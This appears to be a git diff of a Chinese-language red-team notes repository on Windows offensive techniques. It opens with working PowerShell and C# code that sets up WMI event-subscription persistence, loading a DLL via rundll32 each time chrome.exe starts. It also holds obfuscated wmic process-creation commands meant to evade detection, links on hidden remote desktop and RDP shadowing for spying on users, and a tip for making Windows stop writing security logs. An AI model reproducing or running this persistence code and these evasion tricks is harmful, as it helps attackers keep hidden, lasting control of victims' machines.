CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams
# Bind filter to consumer
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
Filter = $filterResult
Consumer = $consumerResult
}
Set-WmiInstance @wmiParams
```
C\#:
```csharp
using System;
using System.Text;
using System.Management;
namespace WMIPersistence
{
class Program
{
static void Main(string[] args)
{
PersistWMI();
}
static void PersistWMI()
{
ManagementObject myEventFilter = null;
ManagementObject myEventConsumer = null;
ManagementObject myBinder = null;
String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll";
String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
"WHERE TargetInstance ISA \"Win32_Process\" " +
"AND TargetInstance.Name = \"chrome.exe\"";
try
{
ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
myEventFilter = wmiEventFilter.CreateInstance();
myEventFilter["Name"] = "BugSecFilter";
myEventFilter["Query"] = myEventQuery.QueryString;
myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
myEventFilter["EventNameSpace"] = @"\root\cimv2";
myEventFilter.Put();
myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
myEventConsumer["Name"] = "BugSecConsumer";
myEventConsumer["CommandLineTemplate"] = CommandLine;
myEventConsumer.Put();
myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
myBinder["Filter"] = myEventFilter.Path.RelativePath;
myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
myBinder.Put();
}
catch (Exception e)
{
Console.WriteLine(e);
}
Console.ReadKey();
}
}
}
```
参考文章:
{% embed url="https://github.com/AxelPotato/WMI" caption="" %}
{% embed url="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/kernel/introduction-to-wmi" caption="" %}

2
privilege-escalation/bug.md Normal file
View File

@ -0,0 +1,2 @@
# 漏洞

2
privilege-escalation/untitled-4.md Normal file
View File

@ -0,0 +1,2 @@
# UAC Bypass

2
privilege-escalation/wrong-config.md Normal file
View File

@ -0,0 +1,2 @@
# 错误配置

12
process/creat-new-process.md Normal file
View File

@ -0,0 +1,12 @@
# 启动进程
WMI:
```text
wmic process call create "\\?\UNC\127.0.0.1\C$\windows\system32\calc.exe"
wmic process call create "\\.\GLOBALROOT\??\UNC\127.0.0.1\C$\windows\system32\calc.exe"
wmic process call create "\\;lanmanredirector\127.0.0.1\C$\windows\system32\calc.exe"
wmic process call create "\\.\globalroot\osdataroot\windows\notepad.exe"
wmic process call create "\\.\global\globalroot\device\mup\;lanmanredirector\.\localhost\c$\\windows\:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data:$data nul..\ /..\..\write.exe"
```

14
rats/hidden-remote.md Normal file
View File

@ -0,0 +1,14 @@
# Hidden Remote
HVNC:
{% embed url="https://bbs.pediy.com/thread-264956.htm" caption="" %}
HRDP:
{% embed url="https://bbs.pediy.com/thread-265188.htm" caption="" %}
Remote Desktop Shadowing:
{% embed url="https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing" caption="" %}

2
rats/stealer/README.md Normal file
View File

@ -0,0 +1,2 @@
# Stealer

6
rats/stealer/shu-ru-fa.md Normal file
View File

@ -0,0 +1,6 @@
# 输入法
参考链接:
{% embed url="https://www.cnki.com.cn/Article/CJFDTotal-JCJS202005014.htm" caption="" %}

14
tips/some-tips.md Normal file
View File

@ -0,0 +1,14 @@
# 鬼知道有什么用的小知识
Win+Ctrl+Shift+B 重启图形驱动
ShellBrowserWindow创建的进程被any.run标记为用户手动执行
64位系统上的32位杀软有可能扫描不到c:\windows\sysnative下的文件
添加CurrentControlSet\Control\MiniNtwin会认为自己是pe系统并不再记录安全日志
Win+R 输入”.exe://“ 会重启explorer
echo qwqdanchun&gt;C:\SYSTEM~1\ClientRecoveryPasswordRotation\test.txt\([https://twitter.com/jonasLyk/status/1368259706423230464?s=20](https://twitter.com/jonasLyk/status/1368259706423230464?s=20)\)

2
tools/untitled.md Normal file
View File

@ -0,0 +1,2 @@
# Untitled